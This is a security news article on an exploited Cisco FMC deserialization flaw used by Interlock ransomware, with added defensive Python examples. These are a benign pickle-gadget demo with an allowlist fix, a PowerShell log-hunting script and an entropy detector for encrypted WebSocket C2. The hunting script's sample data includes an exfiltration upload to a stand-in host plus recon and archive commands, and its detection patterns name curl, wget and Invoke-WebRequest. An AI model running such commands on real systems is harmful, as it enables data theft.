A critical zero-day vulnerability in Cisco Secure Firewall Management Center (FMC) is being actively exploited by threat actors to deploy Interlock ransomware across enterprise networks, according to recent security research.
The flaw, tracked as CVE-2026-20131, was abused in real-world attacks for over a month before public disclosure, giving attackers a significant head start over defenders.
The vulnerability stems from an insecure deserialization issue (CWE-502) in the web-based management interface of Cisco FMC.
By sending a specially crafted serialized Java object to that interface, an unauthenticated remote attacker can execute arbitrary code with root-level privileges: the deserialization logic reconstructs attacker-chosen classes and runs their code before any authentication check applies.
With a CVSS score of 10.0, the flaw sits at the highest severity level; a single request from the network is sufficient for full-system compromise of the management server.
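The Java internals of CVE-2026-20131 are not public on this page, so the following added example (not Cisco code and not from the research being reported) uses Python's pickle as a stand-in for the same weakness class, CWE-502: the serialized bytes themselves tell the loader which callable to invoke, so any code path that deserializes attacker-controlled input is a remote code execution primitive. The `gadget` function, the `Malicious` class and the allowlist contents are illustrative assumptions; a real gadget chain resolves to something like `os.system`, and the hardened loader is the Python analogue of a Java `ObjectInputFilter` allowlist.

```python
import io
import pickle

# Observable side effect: any "gadget" invoked during deserialization records itself here.
TRIGGERED = []


def gadget(marker):
    """Stand-in for the attacker-chosen callable (hypothetical; os.system in a real chain)."""
    TRIGGERED.append(marker)
    return marker


class Malicious:
    """Hypothetical attacker object: its serialized form instructs the loader to call gadget()."""

    def __reduce__(self):
        # pickle stores (callable, args); the loader calls gadget(*args) on load.
        return (gadget, ("code-executed-during-deserialization",))


def build_payload():
    """What the attacker sends: bytes, not an object. No code of theirs runs until loaded."""
    return pickle.dumps(Malicious())


def unsafe_load(data):
    """Vulnerable pattern (CWE-502): deserialize untrusted bytes with no class restriction."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened loader: only explicitly allowlisted (module, name) pairs may be resolved."""

    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str"), ("builtins", "int")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused to resolve {module}.{name}")


def safe_load(data):
    """Deserialize with the allowlist; a gadget reference fails before anything executes."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def gadget_rejected(data):
    """True when the hardened loader refuses the payload without running the gadget."""
    before = len(TRIGGERED)
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return len(TRIGGERED) == before
    return False


if __name__ == "__main__":
    payload = build_payload()
    print("unsafe loader returned:", unsafe_load(payload), "| gadget ran:", bool(TRIGGERED))
    print("hardened loader rejected payload:", gadget_rejected(payload))
    # Benign data still round-trips through the hardened loader.
    print("benign:", safe_load(pickle.dumps({"host": "fmc01", "ports": [443]})))
```

The point the example makes is that the vulnerable side contains no obvious bug: `pickle.loads` (like Java's `ObjectInputStream.readObject`) is working as designed, and the attacker's code runs during parsing, before the application ever looks at the resulting object. That is why Cisco can offer no workaround short of patching: the dangerous behaviour is in the loader, not in any later check.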
Notably, while Cisco Security Cloud Control (SCC) is also affected, Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) are not, so the exposed population is the management plane (FMC and SCC), not the firewalls it manages.
Threat intelligence indicates that exploitation began as early as January 26, 2026, providing attackers with a 36-day window of undetected activity.
Initial access was achieved via crafted HTTP requests to vulnerable firewall management systems; the requests carried embedded URLs that delivered malicious configuration payloads.
The campaign was partially exposed after a misconfigured staging server used by attackers leaked operational artifacts.
This incident allowed researchers to reconstruct Interlock’s attack chain, revealing a highly structured, multi-stage intrusion process.
Following successful exploitation, attackers deploy a comprehensive PowerShell-based reconnaissance script to enumerate Windows hosts in the compromised environment (FMC itself is a Linux-based appliance, so this stage implies that the operators have already moved beyond the management server).
The script systematically gathers hardware specifications, virtual machine details, and active network connections.
Collected data is then compressed into host-specific archives and exfiltrated, enabling attackers to map the victim’s infrastructure and prioritize high-value assets.
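The recon-then-archive-then-exfiltrate sequence above is a hunting opportunity. The following added example (my own illustration, not tooling from the research or from Cisco) scores PowerShell script-block log entries per host by which stages of that sequence they exhibit; the log lines are constructed for the example, the event IDs assume Windows PowerShell script-block logging (Event ID 4104), and the stage patterns are assumptions about what such a script looks like, not signatures taken from the actual Interlock script.

```python
import re
from collections import defaultdict

# Constructed sample events (not real telemetry): (hostname, event_id, script block text).
SAMPLE_EVENTS = [
    ("WS-042", 4104, "Get-CimInstance Win32_ComputerSystem | Select-Object Manufacturer,Model,TotalPhysicalMemory"),
    ("WS-042", 4104, "Get-CimInstance Win32_Processor; Get-WmiObject Win32_VideoController"),
    ("WS-042", 4104, "Get-NetTCPConnection -State Established | Export-Csv C:\\Users\\Public\\net.csv"),
    ("WS-042", 4104, "Compress-Archive -Path C:\\Users\\Public\\*.csv -DestinationPath C:\\Users\\Public\\$env:COMPUTERNAME.zip"),
    ("WS-042", 4104, "Invoke-WebRequest -Uri https://example.invalid/upload -Method Post -InFile C:\\Users\\Public\\WS-042.zip"),
    ("SRV-DB01", 4104, "Get-Service -Name MSSQLSERVER | Restart-Service"),
    ("WS-117", 4104, "Get-CimInstance Win32_ComputerSystem"),
]

# Assumed stage patterns; each maps to one step of recon -> archive -> exfil.
STAGES = {
    "hardware_enum": re.compile(r"Win32_(ComputerSystem|Processor|VideoController|BIOS|PhysicalMemory)", re.I),
    "net_enum": re.compile(r"Get-NetTCPConnection|\bnetstat\b", re.I),
    "archive": re.compile(r"Compress-Archive|\.zip\b|\b7z\b", re.I),
    "exfil": re.compile(r"Invoke-WebRequest|Invoke-RestMethod|\bcurl\b|\bwget\b", re.I),
}


def stages_by_host(events):
    """Return {host: sorted list of distinct stages seen in that host's script blocks}."""
    seen = defaultdict(set)
    for host, event_id, script in events:
        if event_id != 4104:
            continue  # only script-block logging carries the command text we match on
        for stage, pattern in STAGES.items():
            if pattern.search(script):
                seen[host].add(stage)
    return {host: sorted(stages) for host, stages in seen.items()}


def flagged_hosts(events, threshold=3):
    """Hosts whose script blocks cover at least `threshold` distinct stages of the chain.

    A single Win32_ComputerSystem query is routine admin activity; the combination of
    enumeration, archiving and an outbound upload on one host is what merits a look.
    """
    return sorted(host for host, stages in stages_by_host(events).items() if len(stages) >= threshold)


if __name__ == "__main__":
    for host, stages in stages_by_host(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
    print("flagged:", flagged_hosts(SAMPLE_EVENTS))
```

Scoring on stage coverage rather than on any single cmdlet keeps the rule quiet on ordinary administration (the database server restarting a service, a lone hardware query on WS-117) while still catching a chain whose individual commands are all legitimate PowerShell.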
To maintain persistence, Interlock operators leverage custom-built remote access trojans (RATs) developed in both JavaScript and Java.
The JavaScript variant establishes WebSocket command-and-control (C2) channels whose payloads are RC4-encrypted under rotating keys. RC4 is a broken cipher and offers little real confidentiality, but that is beside the point here: the rotation defeats static content signatures, and the traffic still looks like ordinary WebSocket upgrades to a proxy.
Meanwhile, the Java-based RAT leverages GlassFish libraries to provide redundant backdoor access, increasing resilience against partial remediation efforts.
In addition, attackers deploy a fileless, memory-resident webshell that dynamically decrypts incoming commands at runtime.
This technique minimizes forensic artifacts on disk and complicates detection by traditional endpoint security tools.
Temporal analysis of attacker activity suggests operations aligned with the UTC+3 time zone, consistent with an operator base in Eastern Europe or the Middle East. Working-hour patterns are weak evidence on their own, since they are easy to shift deliberately, so this is an indication rather than attribution.
The Interlock ransomware group appears to prioritize sectors where operational downtime directly translates into financial pressure, including healthcare, manufacturing, education, and critical engineering.
Beyond encryption, Interlock employs aggressive extortion tactics.
Their ransom notes explicitly reference data protection regulations, threatening victims with potential regulatory penalties in addition to data leaks, an approach designed to amplify urgency and increase the likelihood of payment.
Cisco has confirmed that no effective workarounds exist for CVE-2026-20131, making immediate patching the only reliable mitigation strategy.
Organizations using Cisco Secure FMC are strongly advised to apply the latest security updates without delay.
Security teams should also conduct thorough threat hunting after patching, since patching closes the door but does not evict anyone already inside. The behaviours to look for include unusual PowerShell execution on Windows hosts, long-lived or high-entropy WebSocket traffic, and memory-resident artifacts on the FMC host itself.
Given the stealth techniques employed, particular attention should be paid to in-memory threats that may evade conventional detection mechanisms.
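With command payloads RC4-encrypted under rotating keys, as described earlier for the JavaScript RAT, there is no stable byte pattern to signature, so hunting for the WebSocket channel has to lean on properties of the traffic rather than its content. The following added example (my own, not tooling from the research) applies a length-normalised Shannon-entropy check to WebSocket frame payloads. The sample frames are constructed in the block, the key and command text are made-up placeholders, and the RC4 implementation is included only to produce a realistic encrypted sample; the 0.85 threshold is an assumption to be tuned against your own baseline.

```python
import json
import math


def rc4(key: bytes, data: bytes) -> bytes:
    """Minimal RC4 (KSA + PRGA). Used here only to construct a realistic sample frame."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # pseudo-random generation, XORed with the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the maximum for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def entropy_ratio(data: bytes) -> float:
    """Entropy divided by the maximum achievable for this length, so short frames
    are not penalised merely for having fewer bytes than there are byte values."""
    if len(data) < 2:
        return 0.0
    return shannon_entropy(data) / math.log2(min(256, len(data)))


def suspicious_frames(frames, min_len=128, threshold=0.85):
    """Names of frames whose payload is long enough to judge and near-uniformly random.

    JSON, HTML and other text-based application traffic sits well below the threshold;
    encrypted or compressed bodies sit near 1.0. Compressed legitimate traffic will
    also score high, so treat hits as triage candidates, not verdicts.
    """
    return [name for name, payload in frames
            if len(payload) >= min_len and entropy_ratio(payload) >= threshold]


# Constructed sample payloads (not captured traffic).
BENIGN_STATUS = json.dumps(
    {"type": "status", "hosts": [{"name": f"fmc-{i}", "state": "ok"} for i in range(20)]}
).encode()
C2_PLAINTEXT = b"cmd=whoami; hostname; ipconfig /all\n" * 16  # placeholder command text
C2_CIPHERTEXT = rc4(b"rotating-key-0001", C2_PLAINTEXT)          # placeholder key
SAMPLE_FRAMES = [("benign-status", BENIGN_STATUS), ("c2-rc4", C2_CIPHERTEXT)]


if __name__ == "__main__":
    for name, payload in SAMPLE_FRAMES:
        print(f"{name}: {len(payload)} bytes, entropy ratio {entropy_ratio(payload):.2f}")
    print("suspicious:", suspicious_frames(SAMPLE_FRAMES))
```

The entropy ratio is deliberately length-aware: a 64-byte frame can never exceed 6 bits per byte, so comparing raw entropy against a fixed 7.0 cut-off would miss short C2 heartbeats. Pair this with connection-level features (a WebSocket that stays open for hours, beacons at a steady interval, or terminates at a host that serves nothing else) before spending analyst time on a hit.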
The ongoing exploitation of this vulnerability highlights the persistent risk posed by zero-day flaws in perimeter security infrastructure. It underscores the importance of rapid patch management and proactive threat detection.
